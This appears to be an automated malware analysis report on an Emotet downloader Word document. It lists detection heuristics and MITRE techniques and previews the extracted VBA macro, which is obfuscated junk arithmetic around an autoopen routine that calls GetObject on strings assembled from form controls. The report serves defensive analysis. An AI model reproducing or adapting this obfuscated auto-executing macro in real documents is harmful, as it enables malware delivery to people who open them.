MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6916021-0. Static analysis revealed the presence of VBA macros, including an AutoOpen macro that utilizes GetObject, indicating an attempt to execute malicious code. The obfuscated VBA script likely functions as a downloader for a second-stage payload, consistent with Emotet's typical behavior.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6916021-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6916021-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24415 bytes |
SHA-256: 8ac3715168a56f9fde930c7b380282d24bd1c2cb572ff05d88542e034a273f65 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "QAXAUAQB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "acU_wXDB"
Attribute VB_Base = "0{4FCED8B7-30FC-4ED9-A1E7-1F401687FD9E}{78F889BA-9E36-47E5-A472-6210A96358E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "FAGXUAQA"
Attribute VB_Base = "0{3DE04CE5-B0B0-4846-9C33-5EE74FC586C2}{858E5775-70DD-4A6D-B2E8-2266E10C1C0B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "YZQAAD"
Function noAQcUCw()
If UAoDAXQX = vADA4c Then
Set wADwD4Zo = iAZAAoXZ
oXABxAC = tAGAAD4 - 505055942 - 168268245 + Log(680083444 - Atn(zABQcUAZ / FQAAQZZw + jAAQcDA / Tan(178843477))) * (722570223 + Sgn(375321897 / Sin(vAAAD1xC)))
Set wCAAXA = zCCAAQ
End If
If qZccBA = VBAQXA_k Then
Set r4DUxDw = fDUxAABC
kAUAwD = PwxA4A - 718307864 - 952430164 + Log(455767000 - Atn(ZAAkXk / cAQ4UXcU + XBAQCAw / Tan(924078672))) * (298640277 + Sgn(738034148 / Sin(sQQBQw)))
Set KAQGCX = RkAAAQc
End If
End Function
Function zAAAAUAw()
If hAGUUQA = MAXUAwDx Then
Set wQUAoxGZ = JGUQBA
wAw4AA = FZAQAUAB - 284219250 - 817125947 + Log(257052538 - Atn(kU1AwBBA / PQAAAG + YowAX_ / Tan(246632403))) * (840841142 + Sgn(793654468 / Sin(YADXAAQC)))
Set RAwGDAc = fAAQQ4B
End If
If Q1BUACA = H4oDBX Then
Set uX4BoDA = jCwC1xUQ
rAZBAAA = jAD_AcAo - 555087613 - 23826184 + Log(431821409 - Atn(QA1AAAB / pAU_wUA + jxA_AQ_ / Tan(973340830))) * (953480254 + Sgn(478078400 / Sin(bAZ1xQ1k)))
Set YAADQAQQ = tZACkB
End If
If j4ADACQA = RA1XAAB Then
Set EkZwA4 = LAAA_C
WQDDDAA = rDxDAAQ - 571512356 - 510268391 + Log(206464688 - Atn(VAAUUB / WocxB4 + OAD_AAc / Tan(256286743))) * (29559814 + Sgn(848300119 / Sin(v_CAUZx1)))
Set SXAACCD = WQA1ABkG
End If
End Function
Sub autoopen()
m1CQQA
End Sub
Function m1CQQA()
On Error Resume Next
If KA4GwZAx = rAXk_AAo Then
Set j41CGC = J4BZX_
MBBQoBZc = vcCAAUB - 368973020 - 110878762 + Log(596488084 - Atn(z1AAB_w / kAGDC1G + G1BXxo / Tan(251480417))) * (522235078 + Sgn(862993557 / Sin(qDAABo1A)))
Set BAAoXXAB = sAA_AA
End If
If FXDQCAx = zAxcX4cA Then
Set NCQGAUcQ = sAD44AA
nAABADAG = dUQAcX - 470963566 - 560500095 + Log(512986172 - Atn(zQAUCk / TAQcUDU + KABUBA / Tan(27841163))) * (919408799 + Sgn(99276263 / Sin(VkUQQQ)))
Set f_UwGAA = mAwAcD
End If
Set d1wDDA = GetObject(acU_wXDB.UGD1AkUA.Text + FAGXUAQA.VcCAA_AA + acU_wXDB.UGD1AkUA.ControlTipText)
If lAkAAkBk = q_1_4Z Then
Set NGAZwD = MAABBD
VAkAAAB = IxAAA4AA - 712660577 - 448959432 + Log(325920443 - Atn(Ax4woU / fAwAA1 + Y4BU4DD / Tan(424755303))) * (775049975 + Sgn(433238418 / Sin(OBAAAX)))
Set rZAAAU = wBA1UA
End If
If wcxZU1 = mBZBAQ4 Then
Set UUAQAX4 = tcAQADAA
iDAGQAD = IUQZ1A - 985433666 - 974070461 + Log(272105171 - Atn(qADAUA / cUADDwCB + aDAZ4A / Tan(592446402))) * (361723672 + Sgn(462940403 / Sin(CkQUZQA)))
Set OCDUA4k = OABUCQX
End If
If 44628 = 44628 Then
If j4AGGA = EA_BAxXA Then
Set AAxwAAw = ZA4AAADA
GBUwAA = SADAGDA - 536367155 - 787462622 + Log(197038824 - Atn(q_AAAGZX / pCkDoQ4C + cooAUA / Tan(595061147))) * (498456042 + Sgn(721229599 / Sin(IGkAGA)))
Set DBAAQ4 = dXAABAA
End If
If jUAGAQx = HAAcw4x Then
Set cZADA4AD = j_DQAC
BxAZoo_A = IGAkDA_B - 261462350 - 616511046 + Log(655718205 - Atn(IxQBAQBB / fxckx4 + FAwAk_Z / Tan(363086683))) * (25956024 + Sgn(321724842 / Sin(PA_AAZD1)))
Set PDkAAkkw = sxBBQAoA
End If
If CQAZCx = moxkDBx_ Then
Set sDxAAAAX = ZQZAXAww
iU4cUoC = cAGQCA - 845238247 - 325819389 + Log(703240359 - Atn(DAUAAcU / fAAokk__ + JDwkAQA / Tan(223797623))) * (5233956
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.